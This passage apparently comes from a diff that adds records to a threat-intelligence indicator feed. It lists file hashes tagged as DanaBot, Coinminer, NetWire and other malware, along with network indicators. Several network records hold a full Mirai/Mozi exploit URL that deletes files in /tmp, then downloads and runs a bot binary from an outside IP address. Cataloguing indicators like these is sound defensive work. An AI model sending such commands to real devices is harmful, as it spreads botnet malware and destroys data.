"malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6abfe8fd95e34fca1ddcd90ccf61239ea4eb5c7a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628325506, + "hash": [ + "ba4c53d837293773b55690bd825fc9cd", + "5ea9860717085df270ceb887d13b46b76ba96ad4", + "620abcac703ec01dcbc11a696b5bff2a50a8d39db8b3f48f03944b427a75cd98" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7419d555dea6436691ee5bcffef215a0d75eeb95", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628328731, + "hash": [ + "e6785d7bfe681dcf6cabfec4638f3b6a", + "61c367911a857ce08032fac2805651baabf16c01", + "71fb9fdbef50789676876966e06e53bb4a2e55e331d872036e0be33e07352454" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6deb7fd29d5f871e98f11e13e9a72d6f8e35379e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628481924, + "hash": [ + "35cc29e499e5c9ba981d31ea0ff25866", + "6d68e9e9c694fbc79df8392abaea8a913907c63f", + "69534f09f21e5f4a233c507efeafd1ee284c4d1592e4109fb9d36988beaafd75" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "63073589a70564fb45187772042cce5a1cb9be35", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628484520, + "hash": [ + "7f9db0f57c7e0e06c1872c61254f0ad0", + "71002fc6d6c9881ce1e7069990f4194eb468d84c", + "798102a4c6944ccd8658d504f80a90e4f9d16f62cdd34a50e246843f81aa70d2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4119749b2c65f3202734a6df679c58c2bc1ca784", + "type": 
"file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628553917, + "hash": [ + "bc1c661342f8a818a8532f33dff7fd2f", + "71b3162ba3c694247cc708ef9793573dc16eb637", + "83e9e6a6eb1f1c5675ec8036dd98b475abb2309827c8183177b7db5376b99b17" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "25cbfb399c8a3640dbd96f84236a6305ac415853", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628634333, + "hash": [ + "c1b8b1aaa3dc54cbd0566ab50231d772", + "7d67dadc9071a7449bcf184079444e1398d3c812", + "7943fb777cc2134f316c3685ef1cb2240605f34d25bc5b0544adb42fd9a714ff" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2e193b35fff3a4c43a6e9400bc2f685949ec9b2d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628638165, + "hash": [ + "91c448ad4897be9368f3269aadae0e38", + "83164900dba44a6d6d1585777f1c7eb326f0c523", + "341a0f68b55ede24a9f88e6dc5ba3221b747306ea177f1a6aee005e2a4389ebf" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "651159ceb7a455a39ae5ef779cd008dba64e5f01", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274630602548, + "hash": [ + "4c521942d21db87374f61e62f0b557b5", + "870e9ddb5e4b5e0b90b385363b45e7c1d05d713f", + "5e01b38f38f5ad5ec23a93cd86c80d2e355946a7138588c15a4c49cb0ea5d42b" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e95f83a5a3435858542896395dabb8aea3dd7091", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "url": 
"http://194.143.143.236/shell?cd+/tmp;rm+-rf+*;wget+http:/60.212.100.250:51187/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274631280626, + "ip": [ + "194.143.143.236" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f15c60ffc812ffa530679fac904a68e907ca70db", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "gitlab.medicaltech.it", + "url": "https://gitlab.medicaltech.it:443/shell?cd+/tmp;rm+-rf+*;wget+http://60.212.100.250:51187/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274631280626, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8daf92ef3e5e1e08adbc61a584b850acc7b7badc", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274631281504, + "ip": [ + "60.212.100.250" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9677bfc97bf8faf90b7908d483fbe45674d406aa", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "url": "http://185.186.93.108/shell?cd+/tmp;rm+-rf+*;wget+http:/222.141.141.125:52573/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274637080848, + "ip": [ + "185.186.93.108" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cd94a0d76428aa29c584a7c1f1177c9aefd51b3c", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274637081839, + "ip": [ + "222.141.141.125" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d268d177d3eaa8a762a550a4168ed2fba8b7e104", + "type": "file", + "dateFirstSeen": 
"2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643621696, + "hash": [ + "9a011f3742f2abf9c08981d5bc606c3a", + "1ba8369b2cb49e3f97f96f0b8c3090078679a23c", + "4a49274ba0992fd36cf1efb077c337c2a3f662435c665f43e8f59993531cab6b" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "88beda4cb3d9d08017939e4156c7a39cc411e788", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643624647, + "hash": [ + "b8a2cddf223ca1349d8b1a8ce5773aa6", + "25954b1ba1af4f2abfe9174084b5797a7b05229f", + "8eca37910e92d14bd4b42bec9211c8411aebd3b1c1754c423a0b7447bfdcc609" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "024fbe8bfb691522b4fd0c990db709d61aad329e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643626781, + "hash": [ + "3260463ebf7ed1ca893219d0aef294a2", + "270b222cab7df95433d22d59a18e593dda139178", + "d0abea4bc3c234bb059c4fe4c5ba1875714261e5f4c2934ea9b6a25fc1c9e6c4" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6a9113373b29acbe5f9edc1e91c30279ba97cd01", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643629709, + "hash": [ + "345b4276ffa1ee17206e13a6c00eea95", + "2fa1c15a8b515d1222b2308eefaa746172a1256c", + "be471e29cc39bf5a2977535fa4ada21873531b952dfa752c8ea8e25352a8339d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c4ccea7d6732b3a8b96a676f0c658cf29741ca1d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643632592, + "hash": [ + 
"e3f3b29f2773f0ac506294a758a34583", + "4e5fea1610b0e1d7670fe59da668b65336c50452", + "9d946bbbfd0a7e9ef1676bb66f94b3057f3198c814ef016118379d258d8469f7" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b0ac64db895d260df54fb640f96723d9f5ca3ac0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643635756, + "hash": [ + "b7ea0cc99f8ab32b38b186e040792299", + "555ef478ea5dcff6cf0c61083f5db259ec94524c", + "2f0de6e46571a3669485bae98a8b10a827ade39ba924d6431a4c3b87ccf3834a" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9ceee73410b1d3082a58974cc0d6a54e24b57277", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643639223, + "hash": [ + "c40019fa7a09075331f41560144b9fed", + "79a91c780b9d9b0cace57b80ee43fe78de03e823", + "8f804cb90df58d4600f50daac51fa2b19e99675676147fd124a30d6a6b5075b5" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a77c449b912b5f38e7a243d1ae016c72ae891a5b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643643132, + "hash": [ + "be125dda8f481730eb1c3c74b7bd8194", + "9d4b9ef5bd4f3054d9ed758218522683f8e55dd0", + "eeeed38b3f7afaef616bd4d19e63581c982a0d88abf6d9e50a28f2c998088cf0" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a89673bd35ebb765f32b11fbff61dec6e421b6a5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643646691, + "hash": [ + "c74d3c1eafc08e8508ec2e703ac9f857", + "a2c7bc967bb1337cd73e204b6e46c61251b77684", + 
"d3295324be92a53570980f23a08b5c8cdcc8045c2240075c94c44cd045042c51" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0f35d93e9baefa66722cd97eadb16781384d3048", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643904813, + "hash": [ + "1b0c2d942d5020106c4cb4eff1b77273", + "be0d82548a8e701e8693e7bd382969392f0ca093", + "9aa86eb7297a723e49dcd9bd91db21338902ef39f957e776e1b9bfd1279c642b" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8c12b7b9cd928b4c5611bb4abeedce7ba9519ea0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643907283, + "hash": [ + "1b96cd66c844f1aa37b3e52cda27585a", + "ddff2e432f6196611d82a02d650039a5de6ba26e", + "3702b5813c5c6966e7caf64b7579f844298acdb5005a5cd9a46a4188e8db9034" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "dac71c12c3ccf23e06bd9f1d7a49a0981095adc9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643909847, + "hash": [ + "65e534d2434340f6c491dafbf6517d6c", + "e4807e55870dedc767eae94ba435eaf0a69bd489", + "27fa51e57d4513601e36b0dc90332c86de7d31579db13c8b75f0152ab5fcaa2d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4b7d93bb9c2e54b9df5d9c83fd9c942727929d44", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643912373, + "hash": [ + "65e534d2434340f6c491dafbf6517d6c", + "e4807e55870dedc767eae94ba435eaf0a69bd489", + "27fa51e57d4513601e36b0dc90332c86de7d31579db13c8b75f0152ab5fcaa2d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + 
], + "threatList": null + }, + { + "id": "4f5e30e14c9ca9953fd61b9c8016f28e93c4c5de", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643916173, + "hash": [ + "d9f24170f5d03dfcdb77192e3934d6db", + "f3f64aae0b2a7ea3b393b33e2fcd25cb50373dcf", + "9a5f2da8b11a2dba70ac20c7f4fe264d3a34df6081feac133e1d900670006eef" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "eb2214b4dae831db6901580b076b7a9a6733bc94", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644048977, + "hash": [ + "2ed25fbe2922da02cb5ea619c6494266", + "f6742c708fce38406a9d0152bf9b639da7024343", + "8977377d9b4a976d8dcd22338b6308c4eaf6d7542466fa5acbaa970cff484ac7" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fce5ec09dc95bb27468d536bc48ef6d6cb17f6c9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644052017, + "hash": [ + "4eb5f0766d4b7179a33ffbf598b8d443", + "fc96831b79c470fcc02f6a1677a64a0040ee6a6a", + "007169d5b7cdf388af9d58ed54c9ccc290037da47956d2e57718523e69bd5cda" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5a2ac17ac283e44d7740fa4df51d2d14c9a75cd6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644055120, + "hash": [ + "4a27e976e12e7ffc66798c7de87e60bb", + "085a39f8ae9cf6d8150176a6b445d7f43fd3697b", + "cc85d2a696717f0ea37bb51458961bde83eaebadff34bdb576bf11bb63434f13" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "07e1cdb9e3a9c66a6abcb53ee3f0b63bfc09fe77", + "type": "file", + "dateFirstSeen": 
"2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644058767, + "hash": [ + "06dc238fc0d3598fca719d929ee02bf4", + "0fcb8b738eda986af9774872976e8be947c3b02d", + "515d2153a1bdf3d783f117e6c2633d6f0687a2e2caa1d8c5323fc4e1ecbaeee9" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7c6aeaeb4ec45733532c31f08c4e0cdf737ac48b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644061923, + "hash": [ + "43fbb9cb68e9e779712b5beebf73e749", + "3e9229778fcc1ad37d75a796de1cf4aae440529e", + "63e54f716fa95e20c7f15f108df655d235070c92534917037cd12647ec2ce083" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7aec53f6e9b3f95d89d81d20720ce8e24e82485e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644064493, + "hash": [ + "7ca0cb117471c0ef4e07ebb3b23db3b8", + "527917b218b2d6cdb40a22f10402fb622de063bf", + "419591d05d3e998875b77999e901b07b1120f672fb0d47e6d27280b9224831f2" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "115c8a33a5d7d88cd4536dfe4aed551c659013ae", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644067080, + "hash": [ + "a34578cc7e6829f962415c8924719c2a", + "5f10cac3af3ed3484e72eab41878a6c36013e109", + "7f0ea28a27ab5d069b46be30927964b552bf5fe8c52691dffde16b73fb85984c" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "90461f056c30f8fab68f6b76992df7b6e05aef39", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644071423, + "hash": [ + 
"b311ee1d17da1212510688d69ecf2b84", + "6fc9edda87f81e524bb84b6508115fa726d7785a", + "ce7d7709dde4b110c0f09e21c9da52767322840ff4029915bc0a09480c4997de" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7560d0d9a63e1d92ef615a37022c0a6be12bb59a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644074095, + "hash": [ + "e89b3dfac52ed3ce05a4ec0166d38d3a", + "905bb4fb712763851ba5e96f3d8a18cf4ba40f89", + "7466b99f1eff37fdb736a2c056edf7566bec1f65484489a986a4cfe6bbfd3fd3" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a4a6318777102242378556458704d9a3caa40074", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644290372, + "hash": [ + "1d2ae2a538be0963296aa3bc1654c9f7", + "9635975a6234cf60133f81715d32d265cad74ee7", + "c97e52ce527b0287a9813598c93afc1cdccb259303481095720cbb5897164d4f" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "010e81511d4a15a0b7b93e9ba43864e70ab65868", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644785479, + "hash": [ + "1387a4865ad79b1e666e992b5a809860", + "c22d39a59d13b72063567a36a56a8b9e3c963c64", + "a97c5e02637dab419a3417aed3da9ff4be5881af4b399857be138bd2647eae63" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e309919d961474d42b6dd0156f6e7ccb9a85bb44", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274650222668, + "hash": [ + "c6dafa401c07b0fda4bf890bd0fa0e80", + "66ee1fca0dcaa099d9be78103ebfc8ff2ff2e12c", + 
"c837a3801080549d4435929bbdcfddb4847dec3e1ddff0665c7ed99fbcb5643b" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "095f6ca254ea4d46e07527c1b8564abf393e5c80", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274650225985, + "hash": [ + "b78b017b533d08d86def95316aea1766", + "86f7b6c5ce87f066f8a81c9f0268823368a0edcc", + "bc32158d54fdb8c6f18ba62512b1881003b4d10dc96ecf112c19e56f6178bfda" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "af1ceed3447320d020cce88e05cd48b96fe76c21", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274652795041, + "hash": [ + "944830c2d331b1be3c53d8bfc6f59d5d", + "ac4bc0aa95b1729a329cb1aef3fd2b671fa5d0d9", + "cd14308af8c56e0e962c711d6c8d9b55e1ed28454c851042dc4c6ada990df52b" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "5cba39cd1c952fbe58103c54683cda7c63a8dc19", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274663568107, + "hash": [ + "ef2c8872874e15901864487a5a25da24", + "b805fd7203f7fc21ca6adb72fe7d25d668735615", + "a3cd1c4fdd7d10c9d96ab4322e4615e3cd5f1feeaf30a89a38e0938a12c68445" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "8ce675906334b63a0d69c68863d4be76ef53cf85", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274673235205, + "hash": [ + "9d4e1c7cd2f742ad1fbba19401a25906", + 
"c3f82cec573abc3f440c94da4126bfd3cd82c291", + "67ae071b960d2f5e8692632574dd372afb0c5634cff09472d10ce748a60311cd" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "BackSwap", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8363280b2df5e805c35e104cfc9a4a427bcfbea9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274674677018, + "hash": [ + "d5942dadec87ce2a7da59abb81b06ed5", + "94a57ea5b8ab26614e598b33bd9462365f4462bb", + "0a5544643a042d7d1a580e8fbd430a1ae3f8f9cc6d25db9bf71d308a108cfaa6" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dabe6b8349d4b939082e7b9a3c763fca1128cdd4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274674680430, + "hash": [ + "421cbfd63acb98479472651c9c321d62", + "aebbed555234a21a22a66e98e89fbea0f2300420", + "67e408979b0b0f86b4b3c9a3e17885cad82c142e2a25e42f87a2e1c67e13c88b" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "82f8cac7f94a4edaaa2fcb3eef9f9ceb2fdc5aa9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274675640931, + "hash": [ + "bd335578c74493fff1830699f7100af4", + "aea937fde12d918f60deb0139b0ef5ac06b47ab6", + "5d42c928b2e64bfaa9184e2097e138df129c7d17ad1117dd771d49b80ba945cd" + ], + "malwareList": [ + { + "name": "Silence.ProxyBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7abf094c86279d0a22ae93dc742efdb522962bdf", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274675645000, + "hash": [ + "b36b729f05b0980407233d32acda3b96", + "b96297b59ac3e72b0d9284c25fc997345d08adb6", + 
"41292aad5c12b1b254babb6d69ba51fdcb91816779d2a9e50190853ef40cd1e3" + ], + "malwareList": [ + { + "name": "Silence.ProxyBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "013f704bb19dcc69483a7f67788c8ae1c0ad1bb1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274677771468, + "hash": [ + "31b3e1b0f7a773ffa66eaef725dfd0c1", + "af58dad95b52564838897b3f329d834cf76651b9", + "e76fed049a31caf18a22d655ab6dc46d59f9fe1639728a042c832a20489deedd" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a94c086d61952b9420e1658055fafd61c8f871d8", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274677774874, + "hash": [ + "983f4ccc7fdfc0f641230c4a3617ac94", + "b87336c1200cf5c5b7dc46753e0f6c4a87e70746", + "32ddb5078bf2a053e8c291851cc5e2b0fa4cb04a1c974fd3ef03fcf84bafd169" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1b81d8da29b3cd7ea32fc6dd15b3c8e1ee4836ac", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274678752053, + "hash": [ + "6393e5803edd2a8ee5b216b0c61c89c3", + "d495af36e909d20a14ee02c3cf69b147d2a13958", + "07033841c5288a92001918790242e4f2708bacb07822017cd69f1b6dbcc3874d" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "76b1383c1bb277aed99fbe03be22ad2fca25b35c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274678755432, + "hash": [ + "7b48480a5f36ec6fdc3740eea1e9b382", + "d4e8535942cbaf71d40483479d954ff0e4d4933f", + "f665a4f0ccbf9ce17858b085467a87c472723c5d26b2ac8b3e4132ec6930ded3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + 
"threatList": null + }, + { + "id": "799bd51260d47000713ad97054547ebddb55cf09", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274680406918, + "hash": [ + "21c34d64028e24de69b08eba225d3323", + "a0ece05f2d5ea850a4b2c93c31581b275815e763", + "47c1641f42dfbc84a6e22c07b0f2ec0a0d26f3b904fbac3005bac89c6362b45d" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "4374da2c8b40a0c6e825df8010162170518427ed", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274680693101, + "hash": [ + "cacf78f42e19d6253351e97842d815da", + "cd5b4e5564b16e91ca953e18702d5d089d573c4f", + "65b7cbf713e40a472d2fae2beea89ccf9d1b31c23928bf40600654fbf216ef11" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "621f321a9b1f8755264ad9a366c094dfaa89a530", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274687310753, + "hash": [ + "55dda052fbe1631f21a0d960ba1e7535", + "b99301284f655c18cb023847465ea1b30d4041e2", + "64046fc124ccf3acd90331ad17dd3c78672c1003124abc76a89d61744e640757" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ec4626f34d5f10e49685c6fc536ff0b6d61a1415", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691364020, + "hash": [ + "111c77651b999cb8b61a65483e743126", + "a6160f9481fc2cb81a71f43b64d10db41413d251", + "5dbda4c9e0a29dcc4c3b377d82f4df7f17c45f7f928b45cfb6eff96ed55d094d" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dd2a00b5ebf49a29023fb9ce014a1a68349e6f1e", + "type": "file", + "dateFirstSeen": 
